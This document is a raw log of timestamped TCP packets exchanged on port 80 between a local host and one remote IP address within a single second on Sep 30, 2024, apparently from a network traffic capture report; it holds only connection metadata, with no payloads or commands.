Sep 30, 2024 09:57:01.511264086 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511274099 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511277914 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511295080 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511320114 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511363029 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511373997 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511392117 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511399984 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511403084 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511413097 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511423111 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511425018 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511432886 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511435986 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511452913 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511455059 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511466026 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511475086 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511476994 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511487961 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511499882 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511512995 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511559963 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511569977 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511580944 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511591911 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511593103 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511604071 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511609077 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511617899 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511627913 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511627913 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511639118 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511643887 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511676073 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511698961 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511708975 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511718988 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511730909 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511737108 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511744022 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511753082 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511754990 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511765957 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.511768103 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511784077 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.511796951 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.512227058 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.512265921 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.512352943 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.512362957 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.512373924 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.512378931 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.512383938 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.512392044 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.512403965 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.512408972 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.512423038 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.512424946 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.512434006 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.512434959 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.512447119 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.512458086 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.512465954 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.512480974 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.512499094 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.515930891 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.515974045 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.516582012 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.516592979 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.516598940 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.516627073 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.516637087 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.516637087 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.516648054 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.516658068 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.516660929 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.516670942 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.516679049 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.516693115 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.516705036 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.529284000 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.534171104 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534185886 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534204006 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534219980 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534225941 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.534233093 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534240961 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.534250975 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534259081 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.534261942 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534267902 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534271955 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.534275055 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534301043 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534312010 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.534312963 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534338951 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.534419060 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534429073 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534435034 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534445047 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534456015 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534466028 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534470081 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.534478903 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534485102 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.534506083 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534512997 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.534518957 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534528971 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
Sep 30, 2024 09:57:01.534538984 CEST | 49177 | 80 | 192.168.2.22 | 192.3.220.22
Sep 30, 2024 09:57:01.534539938 CEST | 80 | 49177 | 192.3.220.22 | 192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534550905 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534555912 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534562111 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534571886 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534586906 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534599066 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534651995 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534663916 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534673929 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534684896 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534689903 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534698009 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534703970 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534708977 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534718990 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534719944 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534732103 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534734964 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534743071 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534754038 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.534754992 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534761906 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.534781933 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535154104 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535165071 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535181046 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535190105 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535192013 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535202980 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535207033 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535214901 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535223007 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535234928 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535254955 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535263062 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535267115 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535271883 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535278082 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535315037 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535370111 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535381079 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535403013 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535407066 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535412073 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535414934 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535425901 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535435915 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535438061 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535448074 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535450935 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535459995 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535464048 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535495996 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535499096 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535509109 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535515070 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535525084 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535530090 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535540104 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535547972 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535552025 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535562038 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535563946 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.535573959 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535588980 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535604954 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.535970926 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536000967 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536006927 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536046982 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536050081 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536063910 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536077023 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536082983 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536086082 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536097050 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536098957 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536113977 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536124945 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536127090 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536139965 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536149979 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536159039 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536163092 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536175966 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536185980 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536251068 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536262035 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536272049 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536282063 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536288023 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536292076 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536305904 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536305904 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536310911 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536317110 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536333084 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536348104 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536355972 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536360979 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536371946 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536375999 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536375999 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536382914 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536397934 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536398888 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536417007 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536431074 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536815882 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536827087 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536838055 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536853075 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536869049 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536880970 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536891937 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536901951 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536911964 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.536915064 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536931992 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.536945105 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537033081 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537043095 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537053108 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537064075 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537075043 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537085056 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537090063 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537096977 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537113905 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537116051 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537116051 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537125111 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537136078 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537136078 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537136078 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537147999 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537152052 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537158966 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537164927 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537169933 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537178040 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537199020 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537201881 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537209988 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537220955 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537230015 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537230968 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537241936 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537242889 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537257910 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537271023 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537655115 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537666082 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537677050 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537692070 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537713051 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537719011 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537733078 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537750006 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537758112 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537761927 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537781000 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537806988 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537870884 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537882090 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537889004 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537899971 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537905931 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537913084 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537918091 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537925005 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537930012 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537940979 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537947893 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537959099 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537959099 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537974119 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537974119 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537985086 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.537991047 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.537996054 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538007975 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538007975 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538018942 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538026094 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538031101 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538038015 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538048029 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538059950 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538060904 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538067102 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538072109 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.538079023 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538089037 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.538110018 CEST4917780192.168.2.22192.3.220.22
